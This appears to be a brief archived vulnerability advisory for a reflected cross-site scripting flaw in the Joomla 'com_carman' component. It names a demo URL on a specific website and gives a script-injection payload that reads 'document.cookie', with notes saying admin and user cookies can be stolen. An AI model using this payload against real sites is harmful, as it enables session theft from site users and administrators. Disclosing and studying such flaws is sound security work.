The Joomla Carman component suffers from a cross site scripting vulnerability.
e026c97957269f446e1ba80a1f07e6806dd90ec74d9556023ac7862471a03bb5
< ------------------- header data start ------------------- >
#####################################################################
Joomla Component com_carman Cross Site Scripting Vulnerability
####################################################################
# author :Fl0riX
# Greetz : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
# Name : com_carman
# Bug Type : Cross Site Scripting
# Infection : Yönetici ve User cookieleri çalýnabilir.
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir.
# Demo Vuln. :
http://carman.webformatique.com/index.php?option=com_carman&msg=[XSS CODE]
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>
< -- bug code end of -- >
_________________________________________________________________
Windows Live: Arkadaþlarýnýz size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010